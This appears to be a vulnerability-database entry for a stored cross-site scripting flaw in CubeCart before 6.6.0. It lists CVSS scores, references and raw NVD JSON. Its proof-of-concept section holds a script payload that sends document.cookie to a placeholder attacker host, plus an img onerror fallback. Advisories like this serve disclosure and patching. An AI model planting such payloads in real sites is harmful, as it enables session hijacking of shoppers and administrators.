CVE-2026-39428

Description

CubeCart is an ecommerce software solution. Prior to 6.6.0, a Stored Cross-Site Scripting (XSS) vulnerability exists in CubeCart v6.x. An attacker with administrative privileges can inject malicious JavaScript payloads into multiple fields during the creation or modification of a product. These payloads are stored in the database and executed whenever a user (customer or another administrator) views the affected product pages, which could lead to session hijacking or unauthorized actions. This vulnerability is fixed in 6.6.0.

CVSS Details

CVSS Score

4.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

CubeCart v6.x < 6.6.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- PoC for Stored XSS in CubeCart Product Field -->
<!-- Step 1: Log in as Administrator -->
<!-- Step 2: Navigate to Product Management -> Create/Edit Product -->
<!-- Step 3: Inject the following payload into a vulnerable field (e.g., Product Description) -->

<script>
  // Example: Steal cookies
  fetch('http://attacker-site.com/steal?c=' + document.cookie);
  alert('XSS Triggered');
</script>

<!-- Alternatively, using img tag if script tags are filtered -->
<img src=x onerror="alert('XSS')">

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-39428
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-39428
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-39428/
[4] VulDB https://vuldb.com/cve/CVE-2026-39428
[5] https://github.com/cubecart/v6/security/advisories/GHSA-gvxc-5v7r-272m
[6] https://github.com/cubecart/v6/security/advisories/GHSA-gvxc-5v7r-272m

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-39428", "sourceIdentifier": "[email protected]", "published": "2026-05-13T21:16:46.800", "lastModified": "2026-05-14T16:49:18.583", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "CubeCart is an ecommerce software solution. Prior to 6.6.0, a Stored Cross-Site Scripting (XSS) vulnerability exists in CubeCart v6.x. An attacker with administrative privileges can inject malicious JavaScript payloads into multiple fields during the creation or modification of a product. These payloads are stored in the database and executed whenever a user (customer or another administrator) views the affected product pages, which could lead to session hijacking or unauthorized actions. This vulnerability is fixed in 6.6.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/cubecart/v6/security/advisories/GHSA-gvxc-5v7r-272m", "source": "[email protected]"}, {"url": "https://github.com/cubecart/v6/security/advisories/GHSA-gvxc-5v7r-272m", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}